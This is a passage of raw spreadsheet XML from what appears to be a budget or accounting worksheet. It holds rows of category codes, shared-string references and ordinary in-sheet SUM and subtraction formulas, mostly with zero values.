      </c>
      <c r="AF949" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AG949" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AH949" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AI949" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AJ949" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AK949" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AL949" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AM949" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AN949" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AO949" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AP949" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
    </row>
    <row r="950" ht="18" customHeight="1" spans="1:42">
      <c r="A950" s="10"/>
      <c r="B950" s="10"/>
      <c r="C950" s="28"/>
      <c r="D950" s="10">
        <v>2130803</v>
      </c>
      <c r="E950" s="16" t="s">
        <v>3725</v>
      </c>
      <c r="F950" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G950" s="17"/>
      <c r="H950" s="17"/>
      <c r="I950" s="17"/>
      <c r="J950" s="17"/>
      <c r="K950" s="17"/>
      <c r="L950" s="17"/>
      <c r="M950" s="17"/>
      <c r="N950" s="17"/>
      <c r="O950" s="17"/>
      <c r="P950" s="17"/>
      <c r="Q950" s="17"/>
      <c r="R950" s="17"/>
      <c r="S950" s="17"/>
      <c r="T950" s="17"/>
      <c r="U950" s="17"/>
      <c r="V950" s="17"/>
      <c r="W950" s="17"/>
      <c r="X950" s="17"/>
      <c r="Y950" s="17"/>
      <c r="Z950" s="17"/>
      <c r="AA950" s="17"/>
      <c r="AB950" s="17"/>
      <c r="AC950" s="17"/>
      <c r="AD950" s="17"/>
      <c r="AE950" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AF950" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AG950" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AH950" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AI950" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AJ950" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AK950" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AL950" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AM950" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AN950" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AO950" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AP950" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
    </row>
    <row r="951" ht="18" customHeight="1" spans="1:42">
      <c r="A951" s="10"/>
      <c r="B951" s="10"/>
      <c r="C951" s="28"/>
      <c r="D951" s="10">
        <v>2130804</v>
      </c>
      <c r="E951" s="16" t="s">
        <v>3726</v>
      </c>
      <c r="F951" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G951" s="17"/>
      <c r="H951" s="17"/>
      <c r="I951" s="17"/>
      <c r="J951" s="17"/>
      <c r="K951" s="17"/>
      <c r="L951" s="17"/>
      <c r="M951" s="17"/>
      <c r="N951" s="17"/>
      <c r="O951" s="17"/>
      <c r="P951" s="17"/>
      <c r="Q951" s="17"/>
      <c r="R951" s="17"/>
      <c r="S951" s="17"/>
      <c r="T951" s="17"/>
      <c r="U951" s="17"/>
      <c r="V951" s="17"/>
      <c r="W951" s="17"/>
      <c r="X951" s="17"/>
      <c r="Y951" s="17"/>
      <c r="Z951" s="17"/>
      <c r="AA951" s="17"/>
      <c r="AB951" s="17"/>
      <c r="AC951" s="17"/>
      <c r="AD951" s="17"/>
      <c r="AE951" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AF951" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AG951" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AH951" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AI951" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AJ951" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AK951" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AL951" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AM951" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AN951" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AO951" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AP951" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
    </row>
    <row r="952" ht="18" customHeight="1" spans="1:42">
      <c r="A952" s="10"/>
      <c r="B952" s="10"/>
      <c r="C952" s="28"/>
      <c r="D952" s="10">
        <v>2130805</v>
      </c>
      <c r="E952" s="16" t="s">
        <v>3727</v>
      </c>
      <c r="F952" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G952" s="17"/>
      <c r="H952" s="17"/>
      <c r="I952" s="17"/>
      <c r="J952" s="17"/>
      <c r="K952" s="17"/>
      <c r="L952" s="17"/>
      <c r="M952" s="17"/>
      <c r="N952" s="17"/>
      <c r="O952" s="17"/>
      <c r="P952" s="17"/>
      <c r="Q952" s="17"/>
      <c r="R952" s="17"/>
      <c r="S952" s="17"/>
      <c r="T952" s="17"/>
      <c r="U952" s="17"/>
      <c r="V952" s="17"/>
      <c r="W952" s="17"/>
      <c r="X952" s="17"/>
      <c r="Y952" s="17"/>
      <c r="Z952" s="17"/>
      <c r="AA952" s="17"/>
      <c r="AB952" s="17"/>
      <c r="AC952" s="17"/>
      <c r="AD952" s="17"/>
      <c r="AE952" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AF952" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AG952" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AH952" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AI952" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AJ952" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AK952" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AL952" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AM952" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AN952" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AO952" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AP952" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
    </row>
    <row r="953" ht="18" customHeight="1" spans="1:42">
      <c r="A953" s="10"/>
      <c r="B953" s="10"/>
      <c r="C953" s="28"/>
      <c r="D953" s="10">
        <v>2130899</v>
      </c>
      <c r="E953" s="16" t="s">
        <v>3728</v>
      </c>
      <c r="F953" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G953" s="17"/>
      <c r="H953" s="17"/>
      <c r="I953" s="17"/>
      <c r="J953" s="17"/>
      <c r="K953" s="17"/>
      <c r="L953" s="17"/>
      <c r="M953" s="17"/>
      <c r="N953" s="17"/>
      <c r="O953" s="17"/>
      <c r="P953" s="17"/>
      <c r="Q953" s="17"/>
      <c r="R953" s="17"/>
      <c r="S953" s="17"/>
      <c r="T953" s="17"/>
      <c r="U953" s="17"/>
      <c r="V953" s="17"/>
      <c r="W953" s="17"/>
      <c r="X953" s="17"/>
      <c r="Y953" s="17"/>
      <c r="Z953" s="17"/>
      <c r="AA953" s="17"/>
      <c r="AB953" s="17"/>
      <c r="AC953" s="17"/>
      <c r="AD953" s="17"/>
      <c r="AE953" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AF953" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AG953" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AH953" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AI953" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AJ953" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AK953" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AL953" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AM953" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AN953" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AO953" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AP953" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
    </row>
    <row r="954" ht="18" customHeight="1" spans="1:42">
      <c r="A954" s="10"/>
      <c r="B954" s="10"/>
      <c r="C954" s="28"/>
      <c r="D954" s="10">
        <v>21309</v>
      </c>
      <c r="E954" s="11" t="s">
        <v>3729</v>
      </c>
      <c r="F954" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G954" s="12">
        <f t="shared" ref="G954:R954" si="462">SUM(G955:G956)</f>
        <v>0</v>
      </c>
      <c r="H954" s="12">
        <f t="shared" si="462"/>
        <v>0</v>
      </c>
      <c r="I954" s="12">
        <f t="shared" si="462"/>
        <v>0</v>
      </c>
      <c r="J954" s="12">
        <f t="shared" si="462"/>
        <v>0</v>
      </c>
      <c r="K954" s="12">
        <f t="shared" si="462"/>
        <v>0</v>
      </c>
      <c r="L954" s="12">
        <f t="shared" si="462"/>
        <v>0</v>
      </c>
      <c r="M954" s="12">
        <f t="shared" si="462"/>
        <v>0</v>
      </c>
      <c r="N954" s="12">
        <f t="shared" si="462"/>
        <v>0</v>
      </c>
      <c r="O954" s="12">
        <f t="shared" si="462"/>
        <v>0</v>
      </c>
      <c r="P954" s="12">
        <f t="shared" si="462"/>
        <v>0</v>
      </c>
      <c r="Q954" s="12">
        <f t="shared" si="462"/>
        <v>0</v>
      </c>
      <c r="R954" s="12">
        <f t="shared" si="462"/>
        <v>0</v>
      </c>
      <c r="S954" s="12">
        <v>0</v>
      </c>
      <c r="T954" s="12">
        <v>0</v>
      </c>
      <c r="U954" s="12">
        <v>0</v>
      </c>
      <c r="V954" s="12">
        <v>0</v>
      </c>
      <c r="W954" s="12">
        <v>0</v>
      </c>
      <c r="X954" s="12">
        <v>0</v>
      </c>
      <c r="Y954" s="12">
        <v>0</v>
      </c>
      <c r="Z954" s="12">
        <v>0</v>
      </c>
      <c r="AA954" s="12">
        <v>0</v>
      </c>
      <c r="AB954" s="12">
        <v>0</v>
      </c>
      <c r="AC954" s="12">
        <v>0</v>
      </c>
      <c r="AD954" s="12">
        <v>0</v>
      </c>
      <c r="AE954" s="12">
        <f t="shared" ref="AE954:AP954" si="463">SUM(AE955:AE956)</f>
        <v>0</v>
      </c>
      <c r="AF954" s="12">
        <f t="shared" si="463"/>
        <v>0</v>
      </c>
      <c r="AG954" s="12">
        <f t="shared" si="463"/>
        <v>0</v>
      </c>
      <c r="AH954" s="12">
        <f t="shared" si="463"/>
        <v>0</v>
      </c>
      <c r="AI954" s="12">
        <f t="shared" si="463"/>
        <v>0</v>
      </c>
      <c r="AJ954" s="12">
        <f t="shared" si="463"/>
        <v>0</v>
      </c>
      <c r="AK954" s="12">
        <f t="shared" si="463"/>
        <v>0</v>
      </c>
      <c r="AL954" s="12">
        <f t="shared" si="463"/>
        <v>0</v>
      </c>
      <c r="AM954" s="12">
        <f t="shared" si="463"/>
        <v>0</v>
      </c>
      <c r="AN954" s="12">
        <f t="shared" si="463"/>
        <v>0</v>
      </c>
      <c r="AO954" s="12">
        <f t="shared" si="463"/>
        <v>0</v>
      </c>
      <c r="AP954" s="12">
        <f t="shared" si="463"/>
        <v>0</v>
      </c>
    </row>
    <row r="955" ht="18" customHeight="1" spans="1:42">
      <c r="A955" s="10"/>
      <c r="B955" s="10"/>
      <c r="C955" s="28"/>
      <c r="D955" s="10">
        <v>2130901</v>
      </c>
      <c r="E955" s="16" t="s">
        <v>3730</v>
      </c>
      <c r="F955" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G955" s="17"/>
      <c r="H955" s="17"/>
      <c r="I955" s="17"/>
      <c r="J955" s="17"/>
      <c r="K955" s="17"/>
      <c r="L955" s="17"/>
      <c r="M955" s="17"/>
      <c r="N955" s="17"/>
      <c r="O955" s="17"/>
      <c r="P955" s="17"/>
      <c r="Q955" s="17"/>
      <c r="R955" s="17"/>
      <c r="S955" s="17"/>
      <c r="T955" s="17"/>
      <c r="U955" s="17"/>
      <c r="V955" s="17"/>
      <c r="W955" s="17"/>
      <c r="X955" s="17"/>
      <c r="Y955" s="17"/>
      <c r="Z955" s="17"/>
      <c r="AA955" s="17"/>
      <c r="AB955" s="17"/>
      <c r="AC955" s="17"/>
      <c r="AD955" s="17"/>
      <c r="AE955" s="17">
        <f t="shared" ref="AE955:AP956" si="464">G955-S955</f>
        <v>0</v>
      </c>
      <c r="AF955" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AG955" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AH955" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AI955" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AJ955" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AK955" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AL955" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AM955" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AN955" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AO955" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AP955" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
    </row>
    <row r="956" ht="18" customHeight="1" spans="1:42">
      <c r="A956" s="10"/>
      <c r="B956" s="10"/>
      <c r="C956" s="28"/>
      <c r="D956" s="10">
        <v>2130999</v>
      </c>
      <c r="E956" s="16" t="s">
        <v>3731</v>
      </c>
      <c r="F956" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G956" s="17"/>
      <c r="H956" s="17"/>
      <c r="I956" s="17"/>
      <c r="J956" s="17"/>
      <c r="K956" s="17"/>
      <c r="L956" s="17"/>
      <c r="M956" s="17"/>
      <c r="N956" s="17"/>
      <c r="O956" s="17"/>
      <c r="P956" s="17"/>
      <c r="Q956" s="17"/>
      <c r="R956" s="17"/>
      <c r="S956" s="17"/>
      <c r="T956" s="17"/>
      <c r="U956" s="17"/>
      <c r="V956" s="17"/>
      <c r="W956" s="17"/>
      <c r="X956" s="17"/>
      <c r="Y956" s="17"/>
      <c r="Z956" s="17"/>
      <c r="AA956" s="17"/>
      <c r="AB956" s="17"/>
      <c r="AC956" s="17"/>
      <c r="AD956" s="17"/>
      <c r="AE956" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AF956" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AG956" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AH956" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AI956" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AJ956" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AK956" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AL956" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AM956" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AN956" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AO956" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
      <c r="AP956" s="17">
        <f t="shared" si="464"/>
        <v>0</v>
      </c>
    </row>
    <row r="957" ht="18" customHeight="1" spans="1:42">
      <c r="A957" s="10"/>
      <c r="B957" s="10"/>
      <c r="C957" s="28"/>
      <c r="D957" s="10">
        <v>21399</v>
      </c>
      <c r="E957" s="11" t="s">
        <v>3732</v>
      </c>
      <c r="F957" s="14">
        <f t="shared" si="449"/>
        <v>192</v>
      </c>
      <c r="G957" s="12">
        <f t="shared" ref="G957:R957" si="465">SUM(G958:G959)</f>
        <v>0</v>
      </c>
      <c r="H957" s="12">
        <f t="shared" si="465"/>
        <v>0</v>
      </c>
      <c r="I957" s="12">
        <f t="shared" si="465"/>
        <v>6</v>
      </c>
      <c r="J957" s="12">
        <f t="shared" si="465"/>
        <v>0</v>
      </c>
      <c r="K957" s="12">
        <f t="shared" si="465"/>
        <v>0</v>
      </c>
      <c r="L957" s="12">
        <f t="shared" si="465"/>
        <v>0</v>
      </c>
      <c r="M957" s="12">
        <f t="shared" si="465"/>
        <v>4</v>
      </c>
      <c r="N957" s="12">
        <f t="shared" si="465"/>
        <v>0</v>
      </c>
      <c r="O957" s="12">
        <f t="shared" si="465"/>
        <v>182</v>
      </c>
      <c r="P957" s="12">
        <f t="shared" si="465"/>
        <v>0</v>
      </c>
      <c r="Q957" s="12">
        <f t="shared" si="465"/>
        <v>0</v>
      </c>
      <c r="R957" s="12">
        <f t="shared" si="465"/>
        <v>0</v>
      </c>
      <c r="S957" s="12">
        <v>0</v>
      </c>
      <c r="T957" s="12">
        <v>0</v>
      </c>
      <c r="U957" s="12">
        <v>6</v>
      </c>
      <c r="V957" s="12">
        <v>0</v>
      </c>
      <c r="W957" s="12">
        <v>0</v>
      </c>
      <c r="X957" s="12">
        <v>0</v>
      </c>
      <c r="Y957" s="12">
        <v>4</v>
      </c>
      <c r="Z957" s="12">
        <v>0</v>
      </c>
      <c r="AA957" s="12">
        <v>182</v>
      </c>
      <c r="AB957" s="12">
        <v>0</v>
      </c>
      <c r="AC957" s="12">
        <v>0</v>
      </c>
      <c r="AD957" s="12">
        <v>0</v>
      </c>
      <c r="AE957" s="12">
        <f t="shared" ref="AE957:AP957" si="466">SUM(AE958:AE959)</f>
        <v>0</v>
      </c>
      <c r="AF957" s="12">
        <f t="shared" si="466"/>
        <v>0</v>
      </c>
      <c r="AG957" s="12">
        <f t="shared" si="466"/>
        <v>0</v>
      </c>
      <c r="AH957" s="12">
        <f t="shared" si="466"/>
        <v>0</v>
      </c>
      <c r="AI957" s="12">
        <f t="shared" si="466"/>
        <v>0</v>
      </c>
      <c r="AJ957" s="12">
        <f t="shared" si="466"/>
        <v>0</v>
      </c>
      <c r="AK957" s="12">
        <f t="shared" si="466"/>
        <v>0</v>
      </c>
      <c r="AL957" s="12">
        <f t="shared" si="466"/>
        <v>0</v>
      </c>
      <c r="AM957" s="12">
        <f t="shared" si="466"/>
        <v>0</v>
      </c>
      <c r="AN957" s="12">
        <f t="shared" si="466"/>
        <v>0</v>
      </c>
      <c r="AO957" s="12">
        <f t="shared" si="466"/>
        <v>0</v>
      </c>
      <c r="AP957" s="12">
        <f t="shared" si="466"/>
        <v>0</v>
      </c>
    </row>
    <row r="958" ht="18" customHeight="1" spans="1:42">
      <c r="A958" s="10"/>
      <c r="B958" s="10"/>
      <c r="C958" s="28"/>
      <c r="D958" s="10">
        <v>2139901</v>
      </c>
      <c r="E958" s="16" t="s">
        <v>3733</v>
      </c>
      <c r="F958" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G958" s="17"/>
      <c r="H958" s="17"/>
      <c r="I958" s="17"/>
      <c r="J958" s="17"/>
      <c r="K958" s="17"/>
      <c r="L958" s="17"/>
      <c r="M958" s="17"/>
      <c r="N958" s="17"/>
      <c r="O958" s="17"/>
      <c r="P958" s="17"/>
      <c r="Q958" s="17"/>
      <c r="R958" s="17"/>
      <c r="S958" s="17"/>
      <c r="T958" s="17"/>
      <c r="U958" s="17"/>
      <c r="V958" s="17"/>
      <c r="W958" s="17"/>
      <c r="X958" s="17"/>
      <c r="Y958" s="17"/>
      <c r="Z958" s="17"/>
      <c r="AA958" s="17"/>
      <c r="AB958" s="17"/>
      <c r="AC958" s="17"/>
      <c r="AD958" s="17"/>
      <c r="AE958" s="17">
        <f t="shared" ref="AE958:AP959" si="467">G958-S958</f>
        <v>0</v>
      </c>
      <c r="AF958" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AG958" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AH958" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AI958" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AJ958" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AK958" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AL958" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AM958" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AN958" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AO958" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AP958" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
    </row>
    <row r="959" ht="18" customHeight="1" spans="1:42">
      <c r="A959" s="10"/>
      <c r="B959" s="10"/>
      <c r="C959" s="28"/>
      <c r="D959" s="10">
        <v>2139999</v>
      </c>
      <c r="E959" s="16" t="s">
        <v>3734</v>
      </c>
      <c r="F959" s="14">
        <f t="shared" si="449"/>
        <v>192</v>
      </c>
      <c r="G959" s="17"/>
      <c r="H959" s="17"/>
      <c r="I959" s="17">
        <v>6</v>
      </c>
      <c r="J959" s="17"/>
      <c r="K959" s="17"/>
      <c r="L959" s="17"/>
      <c r="M959" s="17">
        <v>4</v>
      </c>
      <c r="N959" s="17"/>
      <c r="O959" s="17">
        <v>182</v>
      </c>
      <c r="P959" s="17"/>
      <c r="Q959" s="17"/>
      <c r="R959" s="17"/>
      <c r="S959" s="17"/>
      <c r="T959" s="17"/>
      <c r="U959" s="17">
        <v>6</v>
      </c>
      <c r="V959" s="17"/>
      <c r="W959" s="17"/>
      <c r="X959" s="17"/>
      <c r="Y959" s="17">
        <v>4</v>
      </c>
      <c r="Z959" s="17"/>
      <c r="AA959" s="17">
        <v>182</v>
      </c>
      <c r="AB959" s="17"/>
      <c r="AC959" s="17"/>
      <c r="AD959" s="17"/>
      <c r="AE959" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AF959" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AG959" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AH959" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AI959" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AJ959" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AK959" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AL959" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AM959" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AN959" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AO959" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
      <c r="AP959" s="17">
        <f t="shared" si="467"/>
        <v>0</v>
      </c>
    </row>
    <row r="960" ht="18" customHeight="1" spans="1:42">
      <c r="A960" s="10"/>
      <c r="B960" s="10"/>
      <c r="C960" s="28"/>
      <c r="D960" s="10">
        <v>214</v>
      </c>
      <c r="E960" s="11" t="s">
        <v>3735</v>
      </c>
      <c r="F960" s="14">
        <f t="shared" si="449"/>
        <v>218</v>
      </c>
      <c r="G960" s="12">
        <f t="shared" ref="G960:R960" si="468">G961+G984+G994+G1004+G1009+G1016+G1021</f>
        <v>0</v>
      </c>
      <c r="H960" s="12">
        <f t="shared" si="468"/>
        <v>0</v>
      </c>
      <c r="I960" s="12">
        <f t="shared" si="468"/>
        <v>0</v>
      </c>
      <c r="J960" s="12">
        <f t="shared" si="468"/>
        <v>34</v>
      </c>
      <c r="K960" s="12">
        <f t="shared" si="468"/>
        <v>0</v>
      </c>
      <c r="L960" s="12">
        <f t="shared" si="468"/>
        <v>0</v>
      </c>
      <c r="M960" s="12">
        <f t="shared" si="468"/>
        <v>0</v>
      </c>
      <c r="N960" s="12">
        <f t="shared" si="468"/>
        <v>0</v>
      </c>
      <c r="O960" s="12">
        <f t="shared" si="468"/>
        <v>150</v>
      </c>
      <c r="P960" s="12">
        <f t="shared" si="468"/>
        <v>0</v>
      </c>
      <c r="Q960" s="12">
        <f t="shared" si="468"/>
        <v>34</v>
      </c>
      <c r="R960" s="12">
        <f t="shared" si="468"/>
        <v>0</v>
      </c>
      <c r="S960" s="12">
        <v>0</v>
      </c>
      <c r="T960" s="12">
        <v>0</v>
      </c>
      <c r="U960" s="12">
        <v>0</v>
      </c>
      <c r="V960" s="12">
        <v>34</v>
      </c>
      <c r="W960" s="12">
        <v>0</v>
      </c>
      <c r="X960" s="12">
        <v>0</v>
      </c>
      <c r="Y960" s="12">
        <v>0</v>
      </c>
      <c r="Z960" s="12">
        <v>0</v>
      </c>
      <c r="AA960" s="12">
        <v>50</v>
      </c>
      <c r="AB960" s="12">
        <v>0</v>
      </c>
      <c r="AC960" s="12">
        <v>0</v>
      </c>
      <c r="AD960" s="12">
        <v>0</v>
      </c>
      <c r="AE960" s="12">
        <f t="shared" ref="AE960:AP960" si="469">AE961+AE984+AE994+AE1004+AE1009+AE1016+AE1021</f>
        <v>0</v>
      </c>
      <c r="AF960" s="12">
        <f t="shared" si="469"/>
        <v>0</v>
      </c>
      <c r="AG960" s="12">
        <f t="shared" si="469"/>
        <v>0</v>
      </c>
      <c r="AH960" s="12">
        <f t="shared" si="469"/>
        <v>0</v>
      </c>
      <c r="AI960" s="12">
        <f t="shared" si="469"/>
        <v>0</v>
      </c>
      <c r="AJ960" s="12">
        <f t="shared" si="469"/>
        <v>0</v>
      </c>
      <c r="AK960" s="12">
        <f t="shared" si="469"/>
        <v>0</v>
      </c>
      <c r="AL960" s="12">
        <f t="shared" si="469"/>
        <v>0</v>
      </c>
      <c r="AM960" s="12">
        <f t="shared" si="469"/>
        <v>100</v>
      </c>
      <c r="AN960" s="12">
        <f t="shared" si="469"/>
        <v>0</v>
      </c>
      <c r="AO960" s="12">
        <f t="shared" si="469"/>
        <v>34</v>
      </c>
      <c r="AP960" s="12">
        <f t="shared" si="469"/>
        <v>0</v>
      </c>
    </row>
    <row r="961" ht="18" customHeight="1" spans="1:42">
      <c r="A961" s="10"/>
      <c r="B961" s="10"/>
      <c r="C961" s="28"/>
      <c r="D961" s="10">
        <v>21401</v>
      </c>
      <c r="E961" s="11" t="s">
        <v>3736</v>
      </c>
      <c r="F961" s="14">
        <f t="shared" si="449"/>
        <v>218</v>
      </c>
      <c r="G961" s="12">
        <f t="shared" ref="G961:R961" si="470">SUM(G962:G983)</f>
        <v>0</v>
      </c>
      <c r="H961" s="12">
        <f t="shared" si="470"/>
        <v>0</v>
      </c>
      <c r="I961" s="12">
        <f t="shared" si="470"/>
        <v>0</v>
      </c>
      <c r="J961" s="12">
        <f t="shared" si="470"/>
        <v>34</v>
      </c>
      <c r="K961" s="12">
        <f t="shared" si="470"/>
        <v>0</v>
      </c>
      <c r="L961" s="12">
        <f t="shared" si="470"/>
        <v>0</v>
      </c>
      <c r="M961" s="12">
        <f t="shared" si="470"/>
        <v>0</v>
      </c>
      <c r="N961" s="12">
        <f t="shared" si="470"/>
        <v>0</v>
      </c>
      <c r="O961" s="12">
        <f t="shared" si="470"/>
        <v>150</v>
      </c>
      <c r="P961" s="12">
        <f t="shared" si="470"/>
        <v>0</v>
      </c>
      <c r="Q961" s="12">
        <f t="shared" si="470"/>
        <v>34</v>
      </c>
      <c r="R961" s="12">
        <f t="shared" si="470"/>
        <v>0</v>
      </c>
      <c r="S961" s="12">
        <v>0</v>
      </c>
      <c r="T961" s="12">
        <v>0</v>
      </c>
      <c r="U961" s="12">
        <v>0</v>
      </c>
      <c r="V961" s="12">
        <v>34</v>
      </c>
      <c r="W961" s="12">
        <v>0</v>
      </c>
      <c r="X961" s="12">
        <v>0</v>
      </c>
      <c r="Y961" s="12">
        <v>0</v>
      </c>
      <c r="Z961" s="12">
        <v>0</v>
      </c>
      <c r="AA961" s="12">
        <v>50</v>
      </c>
      <c r="AB961" s="12">
        <v>0</v>
      </c>
      <c r="AC961" s="12">
        <v>0</v>
      </c>
      <c r="AD961" s="12">
        <v>0</v>
      </c>
      <c r="AE961" s="12">
        <f t="shared" ref="AE961:AP961" si="471">SUM(AE962:AE983)</f>
        <v>0</v>
      </c>
      <c r="AF961" s="12">
        <f t="shared" si="471"/>
        <v>0</v>
      </c>
